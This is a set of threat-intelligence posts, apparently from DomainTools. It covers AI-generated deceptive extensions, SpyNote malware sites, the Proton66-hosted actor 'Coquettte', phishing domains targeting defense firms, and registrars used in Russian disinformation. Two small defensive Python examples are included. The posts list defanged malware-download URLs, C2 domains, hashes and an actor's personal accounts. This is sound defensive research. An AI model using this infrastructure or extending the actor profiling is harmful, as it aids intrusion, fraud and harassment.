Deceptions and user risks over privacy and security we observe in hand-crafted malicious extensions can be magnified in those influenced by AI Slop. While AI can generate code quickly, it might lack the nuanced understanding of security vulnerabilities or the ethical considerations that human developers often bring. This can result in extensions riddled with unintentional flaws that are nonetheless exploitable, or even intentionally deceptive features woven into the code with algorithmic efficiency.

The "aspirations" of these AI-assisted deceptive extensions might be less about ingenious design and more about sheer volume. The ease with which they can be generated lowers the barrier for malicious actors, potentially leading to a flood of mediocre but still harmful extensions aimed at overwhelming users and security systems alike. The digital storefronts become crowded marketplaces where discerning genuine value from deceptive imitation becomes an increasingly difficult task for the average user.

The human experience is significantly impacted by this AI Slop. Users, already faced with a bewildering array of choices, are now confronted with an even greater volume of extensions and apps, many of them indistinguishable from legitimate options at a glance. The ability to pick the "perfect" extension becomes an exercise in futility, as the sheer quantity dilutes the quality and increases the risk of encountering a deceptive one. This overabundance erodes trust not just in individual extensions and apps, but in the platforms themselves.

The forces of security now face an even greater challenge. The volume and rapid evolution of AI-Slop-driven extensions and apps make detection and mitigation a constant uphill battle. Traditional signature-based approaches struggle to keep pace with the algorithmic generation of new threats. The gardeners of the digital space must now adapt to a landscape where weeds can sprout with unprecedented speed and in overwhelming numbers.

IOCs on GitHub

https://github.com/DomainTools/SecuritySnacks/blob/main/2025/DeceptiveBrowserExtensions-AISlop

If the community has any additional input, please let us know.

Sign Up For DomainTools Investigations’ Newsletter for the Latest Research

Want more from DomainTools Investigations? Be sure to sign up for our monthly newsletter to get the latest research from the team – available on LinkedIn or email.

Learn More
Research
Newly Registered Domains Distributing SpyNote Malware

Deceptive websites hosted on newly registered domains are being used to deliver AndroidOS SpyNote malware. These sites mimic the Google Chrome install page on the Google Play Store to lure victims into downloading SpyNote, a potent Android remote access trojan (RAT) used for surveillance, data exfiltration, and remote control.

Domains Mimicking App Installation on Google Play Store

Newly registered domains are hosting deceptive websites that mimic popular application installation pages on the Google Play Store to trick victims into downloading malware. Analysis revealed common patterns in domain registration and website structure, with limited variations observed in malware configurations, command and control (C2) infrastructure, and delivery websites. Notably, the threat actor utilized a mix of English and Chinese-language delivery sites and included Chinese-language comments within the delivery site code and the malware itself.

This report further details the malware delivery website configurations and the deceptive techniques employed to trick users into installing the AndroidOS malware. It also provides an overview of the malware’s installation process and C2 configurations. Finally, the GitHub appendices contain indicators of compromise (IOCs), mapping to the MITRE Mobile ATT&CK framework, and a snippet of the AndroidManifest file highlighting the permissions SpyNote seeks on compromised devices.

Domain Registration and Website Patterns

Registrar:

  • NameSilo, LLC
  • XinNet Technology Corporation

IP ISP:

  • Lightnode Limited
  • Vultr Holdings LLC

SSL Issuer:

  • R10
  • R11

NameServer:

  • dnsowl[.]com
  • xincache[.]com

Server Type:

  • nginx

Prominent IP Resolved:

  • 156.244.19[.]63

Frequent Web Endpoint Path:

  • /index/index/download.html
  • /index/index/download.html?id=MTAwMDU%3D

Frequent HTML Code Inclusions:

  • https[:]//unpkg[.]com/current-device@0.10.2/umd/current-device.min.js
  • href="https[:]//play.google[.]com/store/apps/details?id=com.zhiliaoapp.musically"
  • "uUDqyDbaLAZwfdPcR4uvjA"

Malware Delivery Website Review

The websites include an image carousel displaying screenshots of mimicked Google Play app pages. These images are loaded from “bafanglaicai888[.]top,” another suspicious domain suspected to be owned by the same actor. The carousel provides a visual aspect to enhance the illusion of a legitimate app page.

A `<c-wiz>` element acts as a container and a managed component within the web page, responsible for the display and handling of the “Install” button. As a side note, the presence of “com.zhiliaoapp.musically” hints at an interaction related to the TikTok (formerly Musical.ly) Android application, which may be a code remnant of prior versions.

Clicking one of the display images mimicking Google Play Store apps executes the JavaScript function “download()” (shown below), which initiates the download of the .apk file located at the hardcoded URL.

This function works by dynamically creating a hidden iframe and setting its src attribute to a JavaScript snippet. This snippet then uses location.href = src to redirect the iframe to the provided “url” value. Since iframes can initiate downloads, this effectively triggers a download of the file at the given URL. In the case of the above code samples, it would download the 002.apk file from the URL “https[:]//www.kmyjh[.]top/002.apk.”

Analysis of the downloaded .apk files revealed them to be SpyNote dropper malware. SpyNote and its variant, SpyMax, represent a family of potent Android RATs enabling extensive surveillance, data exfiltration, and remote control. Notably, SpyNote has been associated with sophisticated APT groups such as OilRig (APT34), APT-C-37 (Pat-Bear), and OilAlpha, and has been deployed against Indian Defence Personnel. The malware’s appeal to a wide range of threat actors, including advanced groups, underscores its versatility and efficacy for both targeted espionage and broader cybercriminal activities. The availability of a builder tool on underground forums has significantly facilitated its adoption among cybercriminals.

The dropper installs a second .apk file contained within the first via a class function InstallDropSessionActivity(). The class implements the DialogInterface.OnClickListener interface, meaning it’s executed when the user clicks a button (likely the “Confirm” button in the “User Data Info” dialog from InstallDropSessionActivity).

The second .apk file contains the majority of the SpyNote malware functionality. Finally, a base.dex file within the SpyNote’s assets folder contains the connection parameters with the DomainManager.class used for testing and establishing remote connections to the Command and Control (C2) server.

One variation in this configuration was identified in which an IP is hardcoded for the C2, also over port 8282. Notably, the hardcoded IP is the same IP resolved for both C2 domains observed in the other variations.

SpyNote Malware Ramifications

Newly registered domains were identified hosting deceptive websites that mimic popular app installation pages on the Google Play Store. These sites are designed to trick users into downloading malware. Analysis of these campaigns reveals common patterns in domain registration, website structure, and largely consistent malware configurations, command and control (C2) infrastructure, and delivery methods. These websites often include an image carousel displaying screenshots of mimicked Google Play app pages to enhance the illusion of legitimacy. While no definitive attribution is currently available, a China nexus is suspected. This deceptive infrastructure is being leveraged to distribute SpyNote AndroidOS malware.

Analysis of the SpyNote malware reveals a two-stage installation process initiated by an APK dropper, ultimately deploying the core SpyNote RAT from a second embedded APK. Command and control server details are hidden within a DEX file. SpyNote is notorious for its persistence, often requiring a factory reset for complete removal. Upon installation, it aggressively requests numerous intrusive permissions, gaining extensive control over the compromised device. This control allows for the theft of sensitive data such as SMS messages, contacts, call logs, location information, and files. SpyNote also boasts significant remote access capabilities, including camera and microphone activation, call manipulation, and arbitrary command execution. Its robust keylogging functionality, targeting application credentials and utilizing Accessibility Services for two-factor authentication codes, is particularly concerning. Furthermore, SpyNote can remotely wipe data, lock the device, or install further applications. The extensive capabilities of SpyNote underscore its effectiveness as a potent tool for espionage and cybercrime, posing a significant threat to individuals and organizations targeted by these deceptive campaigns.

IOCs on GitHub

If the community has any additional input, please let us know.

https://github.com/DomainTools/SecuritySnacks/blob/main/2025/SpyNote-GooglePlayStore

Sign Up For DomainTools Investigations’ Newsletter for the Latest Research

Want more from DomainTools Investigations? Be sure to sign up for our monthly newsletter to get the latest research from the team – available on LinkedIn or email.

Where to Find Aspiring Hackers

This research analyzes Proton66, a bulletproof hosting network enabling cybercrime operations and serving as a hub for aspiring cybercriminals. It focuses on a threat actor known as "Coquettte" and their ties to the Horrid hacking group, a loosely organized cybercriminal collective fostering amateur threat actors.

Bulletproof Hosting Networks and Proton66

While researching malicious domains hosted on Proton66, we stumbled upon an intriguing discovery—a fake cybersecurity website, cybersecureprotect[.]com, masquerading as a legitimate antivirus service. However, due to an operational security (OPSEC) failure, this domain left its entire malicious infrastructure exposed. This revelation led us down a rabbit hole into the operations of an emerging threat actor known as Coquettte—an amateur cybercriminal leveraging Proton66’s bulletproof hosting to distribute malware and engage in other illicit activities.

Proton66, a well-known Russian bulletproof hosting provider, has long been a haven for cybercriminals looking to operate with impunity. By investigating cybersecureprotect[.]com, we uncovered a larger network of malicious activity, including credential-stealing malware, keyloggers, and trojans, all distributed through Proton66’s infrastructure. Interestingly, Coquettte’s criminal ventures are not limited to malware. Investigators uncovered other projects operated by this actor that suggest a broad interest in illicit activities. One notable example is a website hosted at meth[.]to, which purports to distribute guides on the manufacture of Methamphetamine, C4/Semtex, flashbangs, napalm, and catalytic converter theft. While the site appears to contain detailed instructions, it remains unclear whether the content is genuinely intended as a resource for criminal activity or if it falls into the realm of dark humor, shock content, or trolling.

This analysis provides a detailed technical analysis of Coquettte’s malware infrastructure, including forensic insights into how their campaigns function, the threat posed by Proton66 as a cybercrime enabler, and a comprehensive list of indicators of compromise (IOCs) that security professionals can use to detect and mitigate related threats.

Proton66 as a Threat Actor Breeding Ground

Proton66 is a Russian bulletproof hosting provider (Autonomous System AS198953) notorious for enabling cybercrime by ignoring abuse complaints. In a 2024 threat intelligence report by Intrinsec, researchers identified Proton66 as a key player in the bulletproof hosting arena, facilitating illicit online activities such as malware distribution and phishing campaigns. What sets Proton66 apart is its appeal to less-experienced threat actors; its services allow even amateur hackers to host malicious content with impunity. Many phishing and credential-harvesting sites on Proton66 impersonate major brands (e.g. AT&T, Netflix, GoDaddy, banks, crypto exchanges, and government portals) to steal user data. These operations often exhibit poor OPSEC, indicating the operators are relatively inexperienced.

Example of malicious domains:

Threat Actor “Coquettte” and Their Malware Infrastructure

One emerging threat actor thriving in the Proton66 ecosystem goes by the handle “Coquettte” (note the triple “t”). Coquettte appears to be an amateur cybercriminal leveraging Proton66’s services to deploy malware under the guise of legitimate software. Investigators first uncovered Coquettte’s activities through the domain cybersecureprotect[.]com, a fake cybersecurity product site hosted on Proton66. The website pretended to offer “CyberSecure Pro” antivirus software, but due to an OPSEC failure, its web directory was left publicly accessible – revealing the malicious files within.

The directory contained a compressed zip file (CyberSecure Pro.zip) holding a Windows Installer, CyberSecurePro.msi, which is actually a malware dropper rather than security software. When executed, the installer reaches out to two hard-coded URLs, cia[.]tf and quitarlosi[.], downloads a second-stage payload, and drops additional executables from threat-actor-controlled servers.

Analysis of the retrieved payload revealed that it was flagged as Rugmi (also known as Penguish or associated with the Amadey loader) – a modular malware loader commonly used by cybercriminals to deploy various secondary payloads such as infostealers, trojans, and ransomware. The specific SHA-256 hash of the Rugmi-infected installer was:
a07c9275d2628f6dee9271452a66683831d21367a63cdb61ade0fac55f3ed9ff (CyberSecure Pro[.]zip).

Execution Flow of the Malware:

  • Compressed Archive: CyberSecure Pro[.]zip (SHA-256: a07c9275d2628f6dee9271452a66683831d21367a63cdb61ade0fac55f3ed9ff)
  • Windows Installer Dropper: CyberSecure Pro.msi (SHA-256: 5558b04220e017f2a69fd88c575ec9450bde361049e42fd67501a0f89ba21834)
  • Dropped Files: Upon execution, the .msi file extracts additional payloads, including:
    • CyberSecureV.exe (SHA-256: 0983d99e87d9300d4a1b54c08d9a365160e406e4cd681bfd6ef82052d932a5b4) and stapelia.exe (SHA-256: 1487a4f637a68a5b1dadc379e770431d591421218818164add86c02853a433aa) – Identified as Trojan.Rugmi/Penguish, a loader trojan used to deliver infostealers such as Lumma Stealer, Vidar, RecordBreaker, and Rescoms.
    • Configuration scripts and batch files to maintain persistence and execute additional payloads.

Trojan.Rugmi/Penguish’s Role in the Attack:
Rugmi/Penguish is a malware loader designed for stealthy payload delivery. It typically:

  • Fetches additional malware (infostealers, trojans) from attacker-controlled servers.
  • Evolves its delivery tactics, often used in conjunction with cracked software or fake security products.
  • Uses obfuscation techniques to bypass antivirus detection.
  • Communicates with C2 servers, like cia[.]tf, to receive commands and drop additional payloads.

Coquettte’s personal website, coquettte[.]com, provided additional insights into their online presence. The site, hosted on AWS, at one point displayed a message stating “18 years old software engineer, pursuing a degree in Comp Sci.” This suggests that Coquettte is a young individual, possibly a student, which aligns with the amateurish mistakes (like the open directory) in their cybercrime endeavors.

Further investigation revealed that the cia[.]tf domain, which was used as a malware command-and-control (C2) server, was registered with the email address root[@]coquettte[.]com. This direct link confirmed that Coquettte not only operated cybersecureprotect[.]com as a malware distribution hub, but also controlled cia[.]tf, which facilitated the downloading and execution of malware payloads. By analyzing registration records and domain relations, researchers identified additional infrastructure linked to Coquettte, indicating a broader cybercriminal operation that leveraged Proton66’s bulletproof hosting to persist despite takedown efforts.

Coquettte’s Personal website
Projects and contact information listed within the Coquettte website

Additional Malicious Activities by Coquettte

Interestingly, Coquettte’s criminal ventures are not limited to malware. Investigators uncovered other projects operated by this actor that suggest a broad interest in illicit activities. One notable example is a website hosted at meth[.]to – which, as the name implies, contains how-to guides for illegal substances and weapons.

The site allegedly provides (unverified) recipes and instructions for manufacturing methamphetamine, making explosives like C4/Semtex, constructing improvised devices (e.g. flashbangs, napalm), and even guides on catalytic converter theft. In essence, it functions as an illicit knowledge base or black-market tutorial site. The presence of such content indicates Coquettte (or their associates) are dabbling in the darker corners of cybercrime beyond just malware – potentially trying to run or contribute to an underground marketplace or forum for criminal activities.

Affiliated or Associated Hacking Groups: Horrid[.]xyz and Other Connections

Further analysis of Coquettte’s infrastructure suggests potential ties to a broader hacking group or collective operating under the name “Horrid.” A domain linked to Coquettte, horrid[.]xyz, was registered by the same group and appears to be part of their extended ecosystem. Several other domains associated with their infrastructure include:

  • terrorist[.]ovh
  • meth[.]to
  • meth[.]su

Both meth[.]to and meth[.]su hosted identical content, purporting to distribute guides on illicit activities, while terrorist[.]ovh was similarly structured. The pattern of overlapping infrastructure suggests that the individuals behind these sites may refer to themselves as “Horrid,” with Coquettte being an alias of one of the members rather than a lone actor.

Additionally, a Google Analytics tracker (G-RPK032CCFZ) embedded in some of their sites was linked across at least four domains, further confirming shared ownership:

  • horrid[.]xyz
  • terrorist[.]ovh
  • meth[.]to
  • meth[.]su

These interconnections reinforce the likelihood that “Horrid” operates as a small, loosely structured hacking collective rather than a single individual. The group's affiliation with multiple domains tied to cybercrime and illicit content suggests that it functions as an incubator for aspiring or amateur cybercriminals, providing resources and infrastructure to those looking to establish themselves in underground hacking circles.
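The analytics-tracker pivot described above, written out as an added example (not DomainTools' own tooling): extract Google Analytics IDs from page captures and group domains that share one. The HTML snippets are constructed; only the tracker ID G-RPK032CCFZ and the four Horrid-linked domains come from the report.

```python
"""Pivot on shared web-analytics IDs across captured page bodies."""
import re
from collections import defaultdict

# GA4 measurement IDs (G-XXXXXXXXXX) and legacy Universal Analytics property
# IDs (UA-1234567-1) as they appear in gtag / analytics.js tags.
TRACKER_RE = re.compile(r"\b(G-[A-Z0-9]{6,12}|UA-\d{4,10}-\d{1,3})\b")


def extract_trackers(html):
    """Return the set of analytics IDs found anywhere in a page body."""
    return set(TRACKER_RE.findall(html))


def cluster_by_tracker(captures, min_domains=2):
    """Group domains that embed the same tracker ID.

    captures: dict of domain -> page HTML (e.g. from urlscan or your own crawl).
    Returns dict of tracker ID -> sorted list of domains, keeping only IDs seen
    on at least `min_domains` distinct domains (an ID on one site is no pivot).
    """
    index = defaultdict(set)
    for domain, html in captures.items():
        for tracker in extract_trackers(html):
            index[tracker].add(domain)
    return {t: sorted(d) for t, d in index.items() if len(d) >= min_domains}


# Constructed captures: the four report domains carrying the observed tracker,
# plus an unrelated site with its own (made-up) ID and one without analytics.
SAMPLE_CAPTURES = {
    "horrid[.]xyz": '<script async src="https://www.googletagmanager.com/gtag/js?id=G-RPK032CCFZ"></script>',
    "terrorist[.]ovh": "<script>gtag('config', 'G-RPK032CCFZ');</script>",
    "meth[.]to": "<script>gtag('config', 'G-RPK032CCFZ');</script>",
    "meth[.]su": "<script>gtag('config', 'G-RPK032CCFZ');</script>",
    "unrelated.example": "<script>gtag('config', 'G-AAAA111111');</script>",  # constructed ID
    "plain.example": "<html><body>no analytics here</body></html>",
}

if __name__ == "__main__":
    for tracker, domains in cluster_by_tracker(SAMPLE_CAPTURES).items():
        print(tracker, "->", ", ".join(domains))
```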

Additional Online Presence and Linked Accounts

Beyond their own hosted infrastructure, Coquettte and their associates have left digital footprints across multiple platforms. Several of these accounts were referenced directly on coquettte[.]com in a file titled Contact_me.txt, listing the following links:

  • GitHub: github[.]com/coquettte – Personal GitHub repository, potentially containing malware-related code or past projects.
  • YouTube: youtube[.]com/@uid4 – (also has the alias “chickenwing_11”) Possible media or tutorial content associated with the group, which may serve to share tactics with aspiring cybercriminals.
  • Last.fm Profile: last[.]fm/user/chickenwing_11 – While less directly relevant, this could be a personal account linked to the actor.

Additionally, some of their own infrastructure was self-referenced in Coquettte’s personal website (coquettte[.]com) in a file titled other_projects.txt, which listed:

  • Meth[.]to: (https://meth[.]to/) – A site purporting to distribute guides on illicit activities.
  • Cia[.]tf: (https://cia[.]tf/) – A malware hosting and C2 domain frequently observed in cybercriminal activities.
  • Xn--xuu[.]ws: (https://xn--xuu[.]ws/) – A site that emulates a Linux terminal, which uses code from a community project mercurywork[.]shop, further linking their infrastructure to additional cyber-related projects.

The presence of direct self-references across multiple sites reinforces the interconnected nature of these domains, confirming a shared infrastructure between Horrid, Coquettte, and cia.tf. More importantly, these platforms appear to act as a launchpad for aspiring cybercriminals, giving them access to malware, hosting solutions, and potentially a network of like-minded individuals willing to collaborate on cyber threats.

Proton66 Cyber Threats: Vigilance Needed Against Emerging Malware and Amateur Actors

Proton66-based threats require vigilance on multiple fronts. While the individual threat actor “Coquettte” may be relatively amateur, the malware they deploy (stealers, keyloggers, etc.) can do serious damage if successful. The combination of a bulletproof hosting haven and accessible malware toolkits lowers the bar for entry into cybercrime, meaning even minor actors can pose a risk to organizations. By staying aware of the Proton66 network’s activities and aggressively monitoring for the IOCs and techniques detailed above, security teams can bolster their defenses against this breeding ground of emerging threats.

IOCs on GitHub

If the community has any additional input, please let us know.

https://github.com/DomainTools/SecuritySnacks/blob/main/2025/Proton66-Coquettte

Phishing Campaign Targets Defense and Aerospace Firms Linked to Ukraine Conflict

DomainTools Investigations (DTI) identified a large-scale phishing infrastructure heavily focused on defense and aerospace entities with links to the conflict in Ukraine. The infrastructure comprises a small number of mail servers, each supporting a set of domains designed to spoof that of a specific organization. These domains currently host webmail login pages likely intended to harvest credentials from targeted entities.

This activity is not currently attributed to a specific actor, but available evidence indicates this activity is motivated by cyber espionage, with an emphasis on intelligence collection related to the ongoing conflict in Ukraine.

Detection of Phishing on a Spoofed Ukroboronprom Domain

DTI initially identified a likely phishing page hosted on the domain kroboronprom[.]com a domain spoofing Ukroboronprom, Ukraine’s largest arms manufacturer. The phishing page, located at https[:]//kroboronprom[.]com/sso/login?url=/webmail/?homepage, presents a webmail login prompt. The attackers appear to have built the page using Mailu, an open-source mail server software available on GitHub.

Figure 1. Webmail login page hosted on kroboronprom[.]com

Analysis using DomainTools Iris revealed that the kroboronprom[.]com domain was first seen on December 20, 2024, was hosted on GHOSTnet VPS, and displayed the website title “Mailu-Admin | Mailu.” The Iris Pivot Engine identified nine other domains with the same website title, hosted on GHOSTnet VPS, and first seen after December 20, 2024 [1].

  • scooby-doo[.]xyz
  • lucky-guy[.]space
  • santa-clause[.]online
  • yellow-unicorn[.]site
  • sun-flower[.]space
  • rainbow-pony[.]buzz
  • don-quixote[.]quest
  • rocky-jellyfish[.]biz
  • lucky-turtle[.]ink

Table 1. Domains Likely Related to kroboronprom[.]com

These domains were all registered using the registrar Spaceship. A second search [2] using the Pivot Engine for domains containing a “-” character, registered via Spaceship, hosted on GHOSTnet VPS IP addresses, and first observed after December 20, 2024 revealed three additional domains:

  • space-kitty[.]online
  • stupid-buddy[.]mom
  • hungry-shark[.]site

Data from urlscan.io (“urlscan”) shows that each of these domains hosts a Mailu webmail login page identical to one seen on kroboronprom[.]com, strongly suggesting they are being used for credential theft.

Iris data showed that, with the exception of scooby-doo[.]xyz, all of these serve as MX domains for mail servers, which support a large set of spoofed domains imitating organizations in the defense, aerospace, and IT sectors. These domains were registered via Spaceship and first observed sometime between December 21, 2024 and March 4, 2025. In total, investigation into this activity identified 878 spoofed domains with naming conventions that added or changed a few characters in the targeted entity’s legitimate domain.

DTI has not determined how the actor operationalized this infrastructure. However, the most likely scenario involves phishing emails sent to employees of targeted organizations. The actor likely used spoofed domains in the sender field to make the emails appear as if they originated from within the organization. These emails likely contained malicious links or attachments directing recipients to fake webmail login pages designed to steal credentials.

MX Domain             | MX IP Address   | Spoofed Domain Entity              | Number of Spoofed Domains
hungry-shark[.]site   | 5.230.38[.]154  | Norway-based Defense and Aerospace | 75
stupid-buddy[.]mom    | 5.230.75[.]207  | France-based Aerospace             | 101
space-kitty[.]online  | 5.230.66[.]98   | South Korea-based Defense          | 56
lucky-turtle[.]ink    | 5.230.36[.]139  | France-based Defense               | 88
rocky-jellyfish[.]biz | 5.230.36[.]138  | UK-based Defense                   | 48
don-quixote[.]quest   | 5.230.253[.]157 | Sweden-based Defense and Aerospace | 57
rainbow-pony[.]buzz   | 5.230.68[.]43   | France-based Defense and Aerospace | 65
sun-flower[.]space    | 5.230.44[.]151  | UK-based Defense and Aerospace     | 68
yellow-unicorn[.]site | 5.230.76[.]174  | Italy-based Defense and Aerospace  | 44
lucky-guy[.]space     | 5.231.1[.]60    | Turkey-based Defense               | 82
santa-clause[.]online | 5.231.1[.]57    | United States-based IT             | 93
kroboronprom[.]com    | 5.230.45[.]244  | Ukraine-based Defense              | 101

Table 2. Mail servers and the entities they were likely used to target

Expanded Domain Analysis: Links to Credential Phishing and Malicious File Distribution

Further analysis of the identified infrastructure using urlscan revealed four additional domains likely linked to this activity:

  • rheinemetall[.]com
  • rheinmetall.com[.]de
  • ukrtelecom[.]eu
  • funky-bober[.]art

These domains were visually similar to the MX domains identified above and were also hosted on GHOSTnet VPS infrastructure. Another domain, ukrtelcom[.]com, is likely related to this activity based on Whois data overlap with ukrtelecom[.]eu and rheinemetall[.]com. However, at the time of analysis, ukrtelcom[.]com was not hosted on GHOSTnet VPS and did not host a Mailu credential collection page.
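The two spoofing patterns this report describes, a brand name with a few characters added or changed (kroboronprom, rheinemetall, ukrtelcom) and a brand's own domain reused under another TLD (rheinmetall.com[.]de), can be triaged automatically against a watchlist. This is an added example, not DomainTools' tooling; the watchlist of legitimate domains is assumed for illustration and should come from a verified asset inventory, while the candidate hostnames are the report's own.

```python
"""Lookalike-domain triage: edit distance and brand-label reuse checks."""
from dataclasses import dataclass
from typing import Iterable, List, Optional


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance (insert / delete / substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


@dataclass
class Match:
    candidate: str
    brand_domain: str
    label: str        # the candidate label that resembles the brand
    distance: int
    kind: str         # "typosquat" or "brand-label-reuse"


def refang(host: str) -> str:
    """Normalise a defanged hostname ("example[.]com") for matching only."""
    return host.lower().replace("[.]", ".").strip(".")


def triage(candidate: str, watchlist: Iterable[str]) -> Optional[Match]:
    """Return the closest brand match for a hostname, or None when it is the
    brand's own domain, one of its subdomains, or not similar to any brand."""
    host = refang(candidate)
    brands = [refang(b) for b in watchlist]
    if any(host == b or host.endswith("." + b) for b in brands):
        return None
    # Every label except the TLD can carry the brand; ignore a leading www.
    labels = [lbl for lbl in host.split(".")[:-1] if lbl != "www"]
    best = None
    for brand_domain in brands:
        brand = brand_domain.split(".")[0]
        # Short brand names collide with ordinary words too easily, so allow
        # only one edit for them and two for longer names.
        allowed = 1 if len(brand) < 8 else 2
        for label in labels:
            d = levenshtein(label, brand)
            if d > allowed:
                continue
            kind = "brand-label-reuse" if d == 0 else "typosquat"
            if best is None or d < best.distance:
                best = Match(host, brand_domain, label, d, kind)
    return best


def triage_all(candidates: Iterable[str], watchlist: Iterable[str]) -> List[Match]:
    return [m for m in (triage(c, watchlist) for c in candidates) if m]


# Assumed legitimate domains of the spoofed entities (verify before use).
WATCHLIST = ["rheinmetall.com", "ukroboronprom.com.ua", "ukrtelecom.ua"]

# Hostnames from the report, plus two that must not be flagged.
CANDIDATES = [
    "kroboronprom[.]com", "rheinemetall[.]com", "rheinmetall.com[.]de",
    "ukrtelecom[.]eu", "ukrtelcom[.]com", "cryptshare.rheinemetall[.]com",
    "funky-bober[.]art", "mail.rheinmetall.com",
]

if __name__ == "__main__":
    for m in triage_all(CANDIDATES, WATCHLIST):
        print(f"{m.candidate:30} {m.kind:18} d={m.distance}  ~ {m.brand_domain}")
```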

In addition to credential phishing, the actor likely used the subdomain cryptshare.rheinemetall[.]com to distribute malicious files. Data from urlscan indicates this subdomain was used to facilitate file distribution between late January and mid-February 2025. Screenshots show the page requesting a password before allowing users to retrieve a file. The subdomain name and password request page refer to Cryptshare, a legitimate secure file retrieval service. DTI cannot confirm how the actor used this subdomain; however, given the available evidence, it was most likely used to deliver malicious files.

Figure 2. Screenshot of cryptshare.rheinemetall[.]com

Assessment of Cyber Espionage Activity Targeting Defense and Aerospace Sectors

There is insufficient evidence to attribute this activity to a known actor; however, the activity likely has a cyber espionage motivation. DTI makes this assessment with moderate confidence based on the tactics, techniques, and procedures (TTPs) and the heavy focus on the defense and aerospace sectors. 

The focus on spoofing organizations involved in Ukraine’s defense and telecommunications infrastructure further suggests an intent to gather intelligence related to the conflict in Ukraine. Notably, many of the spoofed defense, aerospace, and IT companies have provided support to Ukraine’s military efforts in its conflict with Russia.

IOCs on GitHub

If the community has any additional input, please let us know.

https://github.com/DomainTools/SecuritySnacks/blob/main/2025/PhishingInfrastructure-UAConflict.csv

Iris Search Hashes

[1]

U2FsdGVkX1/N26ISOMEKt52j4qVRCFOeOdJm5/SVrHprkuaLnu2BQeUp0P0Kc6qfHvj5jP53SaAxcYJDb48++Vqi4NintEcAPIkll0UFs8Dqv6g+tIbYEPXAR9Yrlkqv5MIad+FOlQ8f26MzOpo/M7Hqo94HE1H63Jj+B+DEHHMQ6nNrWIpiEy4XT6Zo2FHo8wSby4ujxE+xC+G9wp5KlAQxnpiW3NjxO6N0NRwt/Evi88HuqJkaBsiChU45YFRUQ4ssMz6PTRmx0f3r7oWwdg2x+VYe6gewGBmhrSZ+CYh7szWd8XGZ1bkHs3PO/bJoLLkYXugS+pII3U3SHEDxSg==

[2]

U2FsdGVkX1/Oxch4IdGieQH7IfShNh73KLEDd36UhzMQ42084cwIoGKpsWU0GBGPtg8+Z3ONxs1f6kJufq/vnm2dFC6OYb0EktrRZwhzkyOZDatwnICp9trBVL1Xa1Ep6ZIxAONKhwESx7raSr+qaQv3eTbH263IY49x6aT1i06O2C48+ZIFN06/+K8+2JIB3qRu18qYJvxZ21dsy77VMz3XHgA0210bqp5/8BFbwJB4HcnLKKLNcssqA+CdMgi4IHEoK/dFEBqHjZuPVo11genM2tr89FwcsEMYGfnDc0tZy1O75JMMwVcXc3rugbRLiRehxUSqXrXc9jda0mjM9IDkmgBYIDw28Cp6jRuUf/I=

Domain Registrars Powering Russian Disinformation: A Deep Dive into Tactics and Trends

In the digital battlefield of influence operations, domain registrations serve as the foundation for launching disinformation campaigns. Russian state-sponsored actors, such as APT28 (Fancy Bear), APT29 (Cozy Bear), and the Internet Research Agency (IRA), have long relied on strategic domain registrations to impersonate trusted entities, spread propaganda, and conduct cyber-enabled espionage.

Despite efforts to curb the abuse of domain registration services, Russian-aligned threat actors continue to exploit specific registrars, hosting providers, and domain obfuscation techniques to evade detection. This analysis explores historical data, cybersecurity reports, and real-world case studies to uncover the domain registrars favored by Russian disinformation operations and the tactics that make their campaigns so effective.

How Russian Disinformation Actors Use Domains

Disguising Disinformation with Fake News Websites

A core strategy of Russian influence operations is the creation of fake news portals that mimic legitimate media organizations. These sites publish pro-Kremlin narratives, fabricated stories, and distorted news articles, often in multiple languages to target diverse audiences.

Example:

  • A 2022 Microsoft report detailed how SEABORGIUM, a Russian state-sponsored group, registered domains mimicking major Western think tanks and media outlets, such as:
    • bloomberg-us[.]com (mimicking Bloomberg)
    • bbcnews[.]site (spoofing BBC News)
    • nato-int[.]org (targeting NATO)

Typosquatting and Homoglyph Attacks

To enhance credibility and fool unsuspecting users, Russian actors frequently engage in typosquatting (registering domains with minor spelling variations) and homoglyph attacks (substituting characters with lookalikes).

Example:

  • APT28 (Fancy Bear) used domains like:
    • dnc-email[.]org instead of dnc.org (2016 U.S. election hack)
    • o365-portal[.]net mimicking Microsoft’s login page

Bulletproof Hosting & Fast Flux Networks

Domain registrations alone are not enough—where a website is hosted matters just as much. Russian influence operators often leverage bulletproof hosting providers in Russia, Moldova, and the Netherlands that turn a blind eye to takedown requests.

Fast Flux techniques (where domain IPs frequently change) further complicate tracking efforts, making it difficult for security teams to take down malicious infrastructure.

Which Domain Registrars Do Russian Disinformation Actors Prefer?

Cyber threat intelligence reports from Mandiant, Recorded Future, Microsoft, Graphika, and Spamhaus reveal a pattern of Russian threat actors registering domains with registrars that offer low-cost, privacy-protected, and anonymous domain services.

Commonly Used Registrars

Registrar            | Why It's Used                                                      | Examples of Use in Disinformation Ops
Namecheap            | Affordable, easy to register anonymously                           | IRA-linked domains used in 2016 U.S. election meddling
Reg.ru (Russia)      | Domestic registrar, less likely to comply with Western takedowns   | Used in pro-Kremlin media campaigns
PublicDomainRegistry | Bulk domain purchases allowed                                      | Used for bot networks spreading fake news
Tucows               | Lax oversight on domain abuse                                      | Hosted domains impersonating U.S. government agencies
Epik                 | Historically associated with extremist content and disinformation  | Favored by fringe political disinformation campaigns

Case Study:

In 2022, security researchers uncovered a Russian disinformation network that registered over 100 fake media domains via Namecheap and Reg.ru, promoting anti-Ukraine narratives in Western countries.

Russian Disinformation Hosting & Infrastructures

Beyond registrars, Russian actors strategically select hosting providers that offer either complete anonymity or jurisdictional protection from Western law enforcement.

  • Bulletproof Hosting: These providers ignore abuse complaints and host malware, phishing sites, and fake news portals.
  • Cloudflare & Reverse Proxies: Russian threat actors often hide behind Cloudflare to mask their hosting locations.
  • Compromised Websites: Instead of registering new domains, Russian operations increasingly hijack legitimate websites to host disinformation.

Example:

  • The Secondary Infektion campaign (Graphika, 2020) used compromised WordPress sites across Europe to spread anti-NATO propaganda while avoiding detection.

Emerging Trends: How Russian Actors Are Evolving Their Tactics

As domain registration oversight improves, Russian actors are adapting their methods to maintain their influence.

Aging Domains for Credibility

Instead of launching new domains immediately, Russian disinformation operators are now registering domains months in advance to make them appear more legitimate before deploying them in active campaigns.

Greater Use of Third-Party Resellers

Rather than registering domains directly, Russian actors are purchasing through resellers that operate under major registrars but have weaker oversight policies.

